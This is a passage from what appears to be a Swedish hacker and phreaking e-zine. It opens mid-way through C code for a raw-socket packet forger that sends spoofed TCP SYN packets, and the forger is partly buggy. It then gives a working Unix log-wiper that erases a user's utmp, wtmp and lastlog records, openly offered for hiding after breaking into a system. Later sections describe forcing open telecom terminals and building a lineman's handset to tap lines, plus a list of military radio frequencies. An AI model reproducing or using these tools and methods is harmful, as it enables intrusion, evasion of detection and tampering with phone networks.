|
|
|
|
lodsl
|
|
|
|
adcl %%eax, %%ebx
|
|
|
|
lodsl
|
|
|
|
adcl %%eax, %%ebx
|
|
|
|
lodsl
|
|
|
|
adcl %%eax, %%ebx
|
|
|
|
lodsl
|
|
|
|
adcl %%eax, %%ebx
|
|
|
|
lodsl
|
|
|
|
adcl %%eax, %%ebx
|
|
|
|
lodsl
|
|
|
|
adcl %%eax, %%ebx
|
|
|
|
lodsl
|
|
|
|
adcl %%eax, %%ebx
|
|
|
|
loop 1b
|
|
|
|
adcl $0, %%ebx
|
|
|
|
movl %%edx, %%ecx
|
|
|
|
2: andl $28, %%ecx
|
|
|
|
je 4f
|
|
|
|
shrl $2, %%ecx
|
|
|
|
clc
|
|
|
|
3: lodsl
|
|
|
|
adcl %%eax, %%ebx
|
|
|
|
loop 3b
|
|
|
|
adcl $0, %%ebx
|
|
|
|
4: movl $0, %%eax
|
|
|
|
testw $2, %%dx
|
|
|
|
je 5f
|
|
|
|
lodsw
|
|
|
|
addl %%eax, %%ebx
|
|
|
|
adcl $0, %%ebx
|
|
|
|
movw $0, %%ax
|
|
|
|
5: test $1, %%edx
|
|
|
|
je 6f
|
|
|
|
lodsb
|
|
|
|
addl %%eax, %%ebx
|
|
|
|
adcl $0, %%ebx
|
|
|
|
6: movl %%ebx, %%eax
|
|
|
|
shrl $16, %%eax
|
|
|
|
addw %%ax, %%bx
|
|
|
|
adcw $0, %%bx
|
|
|
|
"
|
|
|
|
: "=b"(sum)
|
|
|
|
: "0"(sum), "c"(len), "S"(th)
|
|
|
|
: "ax", "bx", "cx", "dx", "si" );
|
|
|
|
|
|
|
|
/* We only want the bottom 16 bits, but we never cleared the top 16. */
|
|
|
|
|
|
|
|
return((~sum) & 0xffff);
|
|
|
|
}
|
|
|
|
|
|
|
|
void resolve_address(struct sockaddr *addr, char *hostname, u_short port) {
|
|
|
|
struct sockaddr_in *address;
|
|
|
|
struct hostent *host;
|
|
|
|
|
|
|
|
address = (struct sockaddr_in *)addr;
|
|
|
|
(void) bzero((char *)address, sizeof(struct sockaddr_in));
|
|
|
|
address->sin_family = AF_INET;
|
|
|
|
address->sin_port = htons(port);
|
|
|
|
address->sin_addr.s_addr = inet_addr(hostname);
|
|
|
|
if ((int)address->sin_addr.s_addr == -1) {
|
|
|
|
host = gethostbyname(hostname);
|
|
|
|
if (host) {
|
|
|
|
bcopy( host->h_addr, (char *)&address->sin_addr, host->h_length);
|
|
|
|
}
|
|
|
|
else {
|
|
|
|
puts("Couldn't resolve address!!!");
|
|
|
|
exit(-1);
|
|
|
|
}
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
char *create_ip(u_long source, u_long dest, u_char protocol, u_char ttl,
|
|
|
|
u_short id, char *data, int data_len)
|
|
|
|
{
|
|
|
|
char *ip_datagram;
|
|
|
|
struct iphdr *ip_header;
|
|
|
|
ip_datagram = malloc(sizeof(struct iphdr) + data_len);
|
|
|
|
ip_header = ip_datagram;
|
|
|
|
ip_header->version = 4;
|
|
|
|
ip_header->tos = 0;
|
|
|
|
ip_header->frag_off = 0;
|
|
|
|
ip_header->check = 0;
|
|
|
|
ip_header->saddr = source;
|
|
|
|
ip_header->daddr = dest;
|
|
|
|
ip_header->protocol = protocol;
|
|
|
|
ip_header->ttl = ttl;
|
|
|
|
ip_header->id = htons(id);
|
|
|
|
ip_header->ihl = 5;
|
|
|
|
ip_header->tot_len = htons(sizeof(struct iphdr) + data_len);
|
|
|
|
ip_header->check = htons(ip_cksum(ip_datagram,sizeof(struct iphdr)));
|
|
|
|
bcopy(data,ip_datagram+sizeof(struct iphdr),data_len);
|
|
|
|
return ip_datagram;
|
|
|
|
}
|
|
|
|
|
|
|
|
char *create_tcp(u_long source, u_long dest, u_short sport, u_short dport,
|
|
|
|
u_long seqnum, u_long acknum, u_char flags, char *data, int datalen)
|
|
|
|
{
|
|
|
|
char *wewt;
|
|
|
|
struct tcphdr *tcp_header;
|
|
|
|
wewt = malloc(sizeof(struct tcphdr) + datalen);
|
|
|
|
tcp_header = wewt;
|
|
|
|
tcp_header->th_sport = sport;
|
|
|
|
tcp_header->th_dport = dport;
|
|
|
|
tcp_header->th_seq = seqnum;
|
|
|
|
tcp_header->th_ack = acknum;
|
|
|
|
tcp_header->th_flags = flags;
|
|
|
|
tcp_header->th_sum = 0;
|
|
|
|
tcp_header->th_sum = htons(tcp_check(tcp_header, sizeof(struct tcphdr),
|
|
|
|
source, dest));
|
|
|
|
bcopy(data,wewt+sizeof(struct tcphdr),datalen);
|
|
|
|
return wewt;
|
|
|
|
}
|
|
|
|
|
|
|
|
void sendpack(char *fromhost, int fromport, char *tohost, int toport) {
|
|
|
|
char *packet;
|
|
|
|
char *tcppacket;
|
|
|
|
char *sendme;
|
|
|
|
static struct sockaddr_in local, remote;
|
|
|
|
static int sock = 0;
|
|
|
|
if (!sock) {
|
|
|
|
resolve_address((struct sockaddr *)&local, fromhost, fromport);
|
|
|
|
resolve_address((struct sockaddr *)&remote, tohost, toport);
|
|
|
|
sock = socket(AF_INET, SOCK_RAW, 255);
|
|
|
|
if (sock == -1) { perror("Getting raw socket"); exit(-1); }
|
|
|
|
}
|
|
|
|
tcppacket = create_tcp(&local.sin_addr, &remote.sin_addr,
|
|
|
|
local.sin_port, remote.sin_port, 795930600, 0, TH_SYN,
|
|
|
|
NULL, 0);
|
|
|
|
packet = create_ip(&local.sin_addr, &remote.sin_addr,
|
|
|
|
6, 24, 4, NULL, 0);
|
|
|
|
sendme = (struct iphdr *)packet;
|
|
|
|
bcopy(tcppacket, sendme+sizeof(struct iphdr), sizeof(tcppacket));
|
|
|
|
printf("the ip header is %d bytes long.\n", sizeof(struct iphdr));
|
|
|
|
printf("the tcp header is %d bytes long.\n", sizeof(struct tcphdr));
|
|
|
|
printf("the ip packet is %d bytes long.\n", sizeof(packet));
|
|
|
|
printf("the tcp packet is %d bytes long.\n", sizeof(tcppacket));
|
|
|
|
printf("the final packet is %d bytes long.\n", sizeof(sendme));
|
|
|
|
{
|
|
|
|
int result;
|
|
|
|
|
|
|
|
result = sendto(sock, packet, sizeof(packet), 0,
|
|
|
|
(struct sockaddr *)&remote, sizeof(remote));
|
|
|
|
if (result != sizeof(packet)) { perror("sending packet"); }
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
main(int argc, char **argv) {
|
|
|
|
if (argc!=5) {
|
|
|
|
printf("usage: %s <from host> <from port> <to host> <to port>\n", argv[0]);
|
|
|
|
exit(-1);
|
|
|
|
}
|
|
|
|
printf("forging packet from %s.%d to %s.%d\n", argv[1], atoi(argv[2]),
|
|
|
|
argv[3], atoi(argv[4]));
|
|
|
|
sendpack(argv[1], atoi(argv[2]), argv[3], atoi(argv[4]));
|
|
|
|
}
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
|
|
|
|
(2)
|
|
|
|
Unix loggar
|
|
|
|
|
|
|
|
Detta är användbart när du brutit dig in i ett Unix system och inte
|
|
|
|
vill bli upptäckt, för när ett företag kommer på ett intrång så ändras
|
|
|
|
lösenord och då blir du tvungen att hacka Unix:en igen men då kan dom
|
|
|
|
ha dragit in ditt andra konto du hadde hos dom
|
|
|
|
|
|
|
|
Dom huvudsakliga loggarna ligger under:
|
|
|
|
/etc/utmp, /usr/adm/wtmp Och /usr/adm/lastlog .
|
|
|
|
De är inte text philer utan måste öppnas av speciella program.
|
|
|
|
Här nedan är ett program som är användbart för det
|
|
|
|
|
|
|
|
***
|
|
|
|
|
|
|
|
#include
|
|
|
|
#define WTMP_NAME "/usr/adm/wtmp"
|
|
|
|
#define UTMP_NAME "/etc/utmp"
|
|
|
|
#define LASTLOG_NAME "/usr/adm/lastlog"
|
|
|
|
|
|
|
|
int f;
|
|
|
|
|
|
|
|
void kill_utmp(who)
|
|
|
|
char *who;
|
|
|
|
{
|
|
|
|
struct utmp utmp_ent;
|
|
|
|
|
|
|
|
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
|
|
|
|
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
|
|
|
|
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
|
|
|
|
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
|
|
|
|
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
|
|
|
|
write (f, &utmp_ent, sizeof (utmp_ent));
|
|
|
|
}
|
|
|
|
close(f);
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
void kill_wtmp(who)
|
|
|
|
char *who;
|
|
|
|
{
|
|
|
|
struct utmp utmp_ent;
|
|
|
|
long pos;
|
|
|
|
|
|
|
|
pos = 1L;
|
|
|
|
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
|
|
|
|
|
|
|
|
while(pos != -1L) {
|
|
|
|
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
|
|
|
|
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
|
|
|
|
pos = -1L;
|
|
|
|
} else {
|
|
|
|
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
|
|
|
|
bzero((char *)&utmp_ent,sizeof(struct utmp ));
|
|
|
|
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
|
|
|
|
write (f, &utmp_ent, sizeof (utmp_ent));
|
|
|
|
pos = -1L;
|
|
|
|
} else pos += 1L;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
close(f);
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
void kill_lastlog(who)
|
|
|
|
char *who;
|
|
|
|
{
|
|
|
|
struct passwd *pwd;
|
|
|
|
struct lastlog newll;
|
|
|
|
|
|
|
|
if ((pwd=getpwnam(who))!=NULL) {
|
|
|
|
|
|
|
|
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
|
|
|
|
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
|
|
|
|
bzero((char *)&newll,sizeof( newll ));
|
|
|
|
write(f, (char *)&newll, sizeof( newll ));
|
|
|
|
close(f);
|
|
|
|
}
|
|
|
|
|
|
|
|
} else printf("%s: ?\n",who);
|
|
|
|
}
|
|
|
|
|
|
|
|
main(argc,argv)
|
|
|
|
int argc;
|
|
|
|
char *argv[];
|
|
|
|
{
|
|
|
|
if (argc==2) {
|
|
|
|
kill_lastlog(argv[1]);
|
|
|
|
kill_wtmp(argv[1]);
|
|
|
|
kill_utmp(argv[1]);
|
|
|
|
printf("Zap2!\n");
|
|
|
|
} else
|
|
|
|
printf("Error.\n");
|
|
|
|
}
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[08] C-Skåp med 5 fingrar knash ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Jag och en skön polare; aemkey drog till någon sunkit disco som någon
|
|
|
|
fritidsgård hade anordnat. Kvällens sommarväder låg på -13º, skummet i
|
|
|
|
ölen hade fryst till en is-sörja. Men inget hindrade 2 Heretics
|
|
|
|
Scouter att dricka för jävlig öl. Nu hade tiden gott och vi hade fått i
|
|
|
|
oss ett par öl och spytt på toan uppe vid macken ett par gånger. Vi stod
|
|
|
|
fortfarnande i det varma vädret och väntade på att solen skulle titta
|
|
|
|
fram, jag vände mig om och gnuggade mig i ögonen och fick syn på ett
|
|
|
|
C-Skåp trodde jag. Jag gick fram för att kolla och det va verkligen ett
|
|
|
|
C-Skåp. Jag stoppade in fingrarna i den lilla glipan som fanns och drog
|
|
|
|
lite och efter ett tags tänkade så kom jag fram till att man kunde dra
|
|
|
|
upp boxen. Så jag hojtade efter aemkey och bad han försöka. Han lydde
|
|
|
|
min uppmaning och drog upp skåpet med inte allt för högt pang, vi
|
|
|
|
kollade efter en massa linor och gamla terminaler. Vi stängde och
|
|
|
|
lämnade boxen eftersom det va ganska mycket folk ute. Allt aemkey gjorde
|
|
|
|
va att stoppa in 5 fingrar som visserligen va frysta och blåa.
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[09] Telia med Gsm crazy-train ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Telia först i världen med att göra fältförsök i praktiken - Upp till
|
|
|
|
fyra gånger snabbare dataöverföring i GSM. Telia Mobile demonstrerade
|
|
|
|
nyligen HSCSD, High Speed Circuit Switch Data, i praktiken i sitt
|
|
|
|
nätverk. Applikationen har levererats av Ericsson och det var första
|
|
|
|
gången någonsin som HSCSD visades i praktiken. Operatörerna kommer att
|
|
|
|
kunna dra nytta av tjänsten på många sätt och användarna kommer märka
|
|
|
|
att kommunikationen går snabbare när det gäller dataöverföring via GSM.
|
|
|
|
Applikationen gör det möjligt att snabba på datakommunikationens inträde
|
|
|
|
på GSM-näten. I den första fasen kommer HSCSD att tillhandahålla en
|
|
|
|
bithastighet på häpnadsväckande 38.4 kbp/s. För slutanvändaren innebär
|
|
|
|
applikationen att viss informationsöverföring går snabbare, som bäst upp
|
|
|
|
till fyra gånger snabbare. Överföringshastighet och prestanda är
|
|
|
|
grundläggande för leverantörerna. När man läser sin e-post eller
|
|
|
|
söker genom företagets intranet är hastighet och enkelhet avgörande för
|
|
|
|
slutanvändaren.
|
|
|
|
|
|
|
|
En högre bithastighet betyder fler nöjda abonnenter, utmärkta affärstil-
|
|
|
|
lfällen och en inkörsport till bättre applikationer för datakommunikati-
|
|
|
|
on och nya teknologier som GPRS. Allt detta är viktigt för operatörerna.
|
|
|
|
Genom att erbjuda högre hastighet kan nya typer av trådlösa
|
|
|
|
applikationer, exempelvis fjärrstyrd videoövervakning, utvecklas och
|
|
|
|
befintliga applikationer fungera smidigare vilket resulterar i nöjdare
|
|
|
|
kunder.
|
|
|
|
|
|
|
|
Källa: www.telia.se
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[10] Säkerhetsbrister i GSM crazy-train ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Telia kommenterar Säpo - chefen Anders Erikssons uttalande angående
|
|
|
|
säkerheten i GSM.
|
|
|
|
|
|
|
|
Vid Folk och Försvarskonferensen i Sälen gjorde Säpo-chefen Anders
|
|
|
|
Eriksson i går uttalanden om säkerheten i GSM. "Avslagna mobiltelefoner
|
|
|
|
bör lämnas utanför sammanträdesrum eftersom de kan användas för
|
|
|
|
avlyssning", hävdar Anders Eriksson.
|
|
|
|
|
|
|
|
Telias kommentar:
|
|
|
|
|
|
|
|
Om GSM-telefonen som används följer GSM - specifikation, har blivit
|
|
|
|
typtestad av ett certifierat testhus och inte är manipulerad är den inte
|
|
|
|
möjlig att använda för avlyssning.
|
|
|
|
|
|
|
|
Om mobiltelefonen har blivit manipulerad eller är felaktig kan detta
|
|
|
|
dock vara möjligt. Ansvaret för att se till att mobilerna håller rätt
|
|
|
|
kvalitet, överensstämmer med den typcertifiering som gjorts samt har en
|
|
|
|
konstruktion som motverkar manipulationer ligger på mobiltelefontillver-
|
|
|
|
karen.
|
|
|
|
|
|
|
|
En normal GSM-telefon går inte att använda för avlyssning.
|
|
|
|
|
|
|
|
|
|
|
|
Källa: www.telia.se
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[11] Fiberoptik för Newbies knash ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Optik kablar andvänds vid tele kommunikation och överföring. Opto
|
|
|
|
kablarna andvänder ljus som informations skickare för en förökad
|
|
|
|
hastighet. För en överföring mellan elektronik till ljus behövs en E/O
|
|
|
|
omvandlare.
|
|
|
|
|
|
|
|
________________
|
|
|
|
E/O Omvandlare
|
|
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
|
|
|
|
|
|
Sändare Mottagare
|
|
|
|
+----+ Optisk Fiber +----+
|
|
|
|
| ||¯¯¯¯¯|-----------------|¯¯¯¯¯|| |
|
|
|
|
| ||_____|-----------------|_____|| |
|
|
|
|
+----+ +----+
|
|
|
|
/\ /\
|
|
|
|
|| ||
|
|
|
|
|| ||
|
|
|
|
|| ||
|
|
|
|
Optisk Optisk
|
|
|
|
Sändare Mottagare
|
|
|
|
|
|
|
|
Det finns många olika fördelar med optofibersystem så som t.ex. låg vikt
|
|
|
|
,hög kapacitet, liten kabeldimension och långa avstånd till förstärkare.
|
|
|
|
|
|
|
|
En opto kabel består av en nypa olika lager av glasfiber. Glaset är
|
|
|
|
mycket rent, grymt rent faktiskt. Om det skulle kunna gå att se in i ett
|
|
|
|
fiber så skulle man kunna se flera mil. Genom kabeln skickas ett
|
|
|
|
infrarött ljus genom fibern, eventuellt genom plast vid kortare
|
|
|
|
överföringsavstånd.
|
|
|
|
|
|
|
|
Ett optiskt fiber består av 4 lager. Jag börjar med det yttersta lagret.
|
|
|
|
|
|
|
|
1. Sekundärskydd 1mm
|
|
|
|
2. Primärskydd 25 µm
|
|
|
|
3. Mantel 125 µm
|
|
|
|
4. Kärna 10 µm
|
|
|
|
|
|
|
|
Opto kabeln täcks av ett lager av stål eller plast som ger önskad
|
|
|
|
hållfasthet mot böjning. Kabeln innhåller även fyllnadsmaterial som
|
|
|
|
skyddar fibrerna mot böjning och väta.
|
|
|
|
|
|
|
|
OBS! Denna information är skrivet med egna ord men från en källa (nedan)
|
|
|
|
Om du vill veta mera om Optofiber så läs Att förstå telekommunikation 1.
|
|
|
|
|
|
|
|
|
|
|
|
Källa: Att förstå Tele Telekommunikation 1
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[12] Hemliga frekvenser crazy-train ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Här har vi lite "hemliga" frekvenser för t.ex radioamatörer och sånt folk.
|
|
|
|
|
|
|
|
|
|
|
|
FLYGVAPNET STIDSLEDNING:
|
|
|
|
|
|
|
|
STRILBAND UHF(225-399,95 MHZ)
|
|
|
|
|
|
|
|
255.35
|
|
|
|
290.95
|
|
|
|
292.85 KANALKOD 423
|
|
|
|
290.80
|
|
|
|
290.90
|
|
|
|
270.80
|
|
|
|
346.70
|
|
|
|
276.80
|
|
|
|
281.10
|
|
|
|
276.35
|
|
|
|
273.70
|
|
|
|
296.10
|
|
|
|
|
|
|
|
|
|
|
|
STRILBAND VHF
|
|
|
|
|
|
|
|
142.45
|
|
|
|
143.45
|
|
|
|
141.10
|
|
|
|
134.80
|
|
|
|
138.25
|
|
|
|
134.90
|
|
|
|
126.15
|
|
|
|
138.10
|
|
|
|
134.20
|
|
|
|
135.20
|
|
|
|
138.80
|
|
|
|
140.10
|
|
|
|
132.30 KANALKOD 500
|
|
|
|
130.50
|
|
|
|
129.45
|
|
|
|
|
|
|
|
|
|
|
|
DIV SAMHORANDE FRKVENSER:
|
|
|
|
|
|
|
|
|
|
|
|
138.60 ALLM,MARIN.
|
|
|
|
143.65 KANALKOD 658
|
|
|
|
122.875(AM)
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[13] Svensk Beige Boxing TheClown ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
Inledning:
|
|
|
|
|
|
|
|
I denna artikel skall jag beskriva svensk beige-boxing på djupet.
|
|
|
|
Var hittar jag tele-terminaler som går att använda, hur kopplar jag in
|
|
|
|
mig på dem och vilka verktyg skall jag ha med mig när jag är ute och
|
|
|
|
"arbetar" på fältet. Denna artikel är främst skriven till "Heretics" men
|
|
|
|
eftersom jag numera startat en egen grupp så kommer vi att använda denna
|
|
|
|
ganska mycket. Hoppas att ifall du inte har en aning om hur svensk
|
|
|
|
Beige-boxing går till kommer att få upp ögonen för detta efter du läst
|
|
|
|
denna artikel.
|
|
|
|
|
|
|
|
Olika Tele-Terminaler:
|
|
|
|
|
|
|
|
Japanare:
|
|
|
|
|
|
|
|
Japanare är små gråa/vita rör med svart lock som telia så smart har
|
|
|
|
placerat ut lite varstans i vårt samhälle. De finns oftast vid täta
|
|
|
|
bostadsområden eller vid radhusområden. De finns oftast i närhet eller
|
|
|
|
brevid lyktstolpar eller elskåp.
|
|
|
|
|
|
|
|
Gråsuggor:
|
|
|
|
|
|
|
|
Små gråa skåp ca 20-25 cm breda som oftast hänger på lite äldre hyreshu-
|
|
|
|
s. Oftast hänger de på utsidan av huset, men det finns också de fall där
|
|
|
|
de hänger inne i trappuppgången. Dessa är inte lika enkla att ta sig in
|
|
|
|
i utan att föra en massa oväsen, men mer till hur det går till sedan.
|
|
|
|
|
|
|
|
Kottar:
|
|
|
|
|
|
|
|
Dessa små prylar har nog inte alla sett såvida ni inte har problem med
|
|
|
|
nacken eller vet att de finns..de är små vita eller gröna porslinsklock-
|
|
|
|
or som sitter längst upp i telefonstolpar. Enda kruxet när man skall
|
|
|
|
koppla in sig på dessa är att man måste vara en hejare på att klättra
|
|
|
|
eller kanske på yxan för att komma åt kotten.
|
|
|
|
|
|
|
|
Hur man tar sig in i teleterminalerna:
|
|
|
|
|
|
|
|
När man skall koppla in sig i dessa fungerar oftast det gamla hederliga
|
|
|
|
sättet: VÅLD! Eller några häftiga hammare eller avbitar-tängar som du
|
|
|
|
naturligtvis har i din lilla väska. Skall lista lite verktyg som kan
|
|
|
|
vara bra att ha med sig när man är ute på utflykt:
|
|
|
|
|
|
|
|
1st Lång vanlig skruvmejsel.
|
|
|
|
1st Liten vanlig skruvmejsel
|
|
|
|
1st Stjärnmejsel
|
|
|
|
1st Multikabeltång (bra att ha istället för en massa småtänger
|
|
|
|
Massa olika kablar av alla de slag (ifall vill vill förlänga osv)
|
|
|
|
|
|
|
|
Naturligtvis kan det vara bra att ha en LMHS (linemans handset) med sig
|
|
|
|
också för att du skall kunna göra något när du väl tagit dig in i
|
|
|
|
teleterminalen. Så här kommer en beskrivning på hur du skall bygga dig
|
|
|
|
en LMHS av bästa kvalite.
|
|
|
|
|
|
|
|
Linemans Handset:
|
|
|
|
|
|
|
|
De enda snygga LMHS jag har sett e de som telia självs gjort, men vad
|
|
|
|
kan man begära, vi gör ju våra hemma medans de får sina fabriks tillver-
|
|
|
|
kade. Men ifall man kämpar bra så kan man få sin egna LMHS riktigt
|
|
|
|
tjusig.Men lägg inte ned för mycket möda på dem, med tanke på att de kan
|
|
|
|
gå sönder väldigt lätt. Telefoner är inte till för att man skall använda
|
|
|
|
ute Ju.
|
|
|
|
|
|
|
|
Vad behöver du för att bygga en LMHS:
|
|
|
|
|
|
|
|
1 st telefon..helst en sådandär med knapparna i luren
|
|
|
|
2 st krokodilklämmor
|
|
|
|
1 st Lödtång (inte nödvändig, men det håller bättre)
|
|
|
|
|
|
|
|
Ta reda på var kabel X och X ligger i den telefon, brukar se ut så här:
|
|
|
|
|
|
|
|
--------------------------------
|
|
|
|
I TELEFONEN I
|
|
|
|
I I
|
|
|
|
I I
|
|
|
|
I I
|
|
|
|
I I
|
|
|
|
I I
|
|
|
|
I I
|
|
|
|
T T X X
|
|
|
|
T T T T
|
|
|
|
T T T T
|
|
|
|
T T T T
|
|
|
|
T T T T
|
|
|
|
T T T T
|
|
|
|
|
|
|
|
|
|
|
|
Klipp av telefon jacket och skala kabeln . Skala även kablarna X och
|
|
|
|
X och fäst krokodil klämmor på X och X. Sedan tar du och skruvar ihop
|
|
|
|
telefonen igen. Sedan har du en egen LMHS som du kan ut och testa.
|
|
|
|
|
|
|
|
|
|
|
|
Känner att jag inte skall skriva mer om svensk beigeboxing just nu utan
|
|
|
|
man kan väl se detta som en liten intruduktion till svensk beigeboxning.
|
|
|
|
|
|
|
|
Skriven av: TheClown
|
|
|
|
För: Heretics och UPOS
|
|
|
|
|
|
|
|
-
|
|
|
|
Knash noterar gärnet...
|
|
|
|
Kottar: de är små vita eller gröna porslinsklock-
|
|
|
|
or som sitter längst upp i telefonstolpar.
|
|
|
|
|
|
|
|
uhh...kottar är inte vita eller gröna, har sånna här och dom är svarta
|
|
|
|
och en aning större en en cola burk, jag har ju klättrat upp och koll-
|
|
|
|
at själv.
|
|
|
|
|
|
|
|
Det gamla hedliga sättet VÅLD !!!
|
|
|
|
|
|
|
|
Jag tvivlar på att man behöver andvända våld för att öppna en box, då
|
|
|
|
låter det så för jävligt.
|
|
|
|
|
|
|
|
|
|
|
|
Tack för bidraget, tänk på att hjälpa Mr Headache också med lite artik-
|
|
|
|
lar också eftersom han behöver hjälp med det.
|
|
|
|
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
¦[14] Programstrukturer crazy-train ¦
|
|
|
|
o----------------------------------------------------------------------o
|
|
|
|
-sekvens (följd av programsatser, först sats 1, sedan sats, osv)
|
|
|
|
-selektion (val mellan två vägar i programmet, antingen Ja - satserna
|
|
|
|
eller Nej-satserna)
|
|
|
|
-iteration (upprepning av satser med olika vilkor)
|
|
|
|
|
|
|
|
Här kommer några exempel i programspråken COMAL, BASIC och Pascal
|
|
|
|
|
|
|
|
|
|
|
|
Programstruktur | COMAL (BASIC) | PASCAL
|
|
|
|
-----------------------------------------------------------------------
|
|
|
|
Val mellan två alt.| 100 IF x < 0 THEN | IF x < 0 THEN
|
|
|
|
Om (vilkor), så | 110 s:=s + x | s:=s + x
|
|
|
|
(Ja-satser) | 120 ELSE | ELSE BEGIN
|
|
|
|
annars | 130 y:=y + x | y:=y + 5
|
|
|
|
Nej-satser) | 140 x:=x + 5 | x:= x + 5
|
|
|
|
slut på valet | 150 ENDIF | END;
|
|
|
|
| (I BASIC skrivs IF-satsen på |
|
|
|
|
| en rad utan ENDIF) |
|
|
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
|
|
Upprepa så länge som| 100 WHILE t < 100 DO | WHILE t < 100 DO BEGIN
|
|
|
|
Så länge (vilkor) | 110 s:=s + t | s:=s + t
|
|
|
|
utför (satser) | 120 t:=t + 2 | t:=t + 2
|
|
|
|
slut på satsen | 130 ENDWHILE | END;
|
|
|
|
| (I BASIC vanligen utan DO |
|
|
|
|
| och med WEND som slut) |
|
|
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
|
|
Upprepa tills | 100 REPEAT | REPEAT
|
|
|
|
Upprepa | 110 x:=(x+a/x)/2 | x:=(x+a/x)/2
|
|
|
|
(satser) | 120 UNTIL ABS (x-a/x)<0.001 | UNTIL ABS (x-a/x)<0.001
|
|
|
|
tills (vilkor) | (I BASIC saknas vanligen |
|
|
|
|
| REPEAT-satsen |
|
|
|
|
| |
|
|
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
|
|
Upprepa ett bestämt | 100 FOR i:= 1 TO n DO | FOR i:=1 TO n DO BEGIN
|
|
|
|
antal gånger | 110 s:=s + x | s:=s + x;
|
|
|
|
Upprepa för | 120 x:=x + 1 | x:=x + 1
|
|
|
|
i=1, 2 ..., n | 130 NEXT i | END;
|
|
|
|
(satser) | (I BASIC utan DO) |
|
|
|
|
slut på upprepningen| |
|
|
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
|
|
-Arimetiska operatorer
|
|
|
|
De fyra vanliga arimetiska operatorerna skrivs + - * /
|
|
|
|
|
|
|
|
Upphöjt till skrivs i
|
|
|
|
COMAL (BASIC): a ^ x (eller ibland a ü x, a ** x)
|
|
|
|
PASCAL: EXP(LN(a)*x)
|
|
|
|
|
|
|
|
-Jämförelseoperatorer och logiska operatorer
|
|
|
|
|
|
|
|
I vilkorsuttrycken används jämförelseoperatorer och logiska operatorer.
|
|
|
|
|
|
|
|
________________________________________________________________________
|
|
|
|
Jämförelseoperator | Exempel | Betydelse
|
|
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
|
|
= | A = B | A är lika med B
|
|
|
|
< > | A < > B | A är inte lika med B
|
|
|
|
> | A > B | A är större än B
|
|
|
|
< | A < B | A är mindre än B
|
|
|
|
> = | A > = B | A är sötrre än eller lika med B
|
|
|
|
< = | A < = B | A är mindre än eller lika med B
|
|
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
|
|
________________________________________________________________________
|
|
|
|
Logisk operator | Exempel | Sant/Falskt
|
|
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
|
|
AND (och) | (30 > 5*5) AND ( -7 < -5) | Sant
|
|
|
|
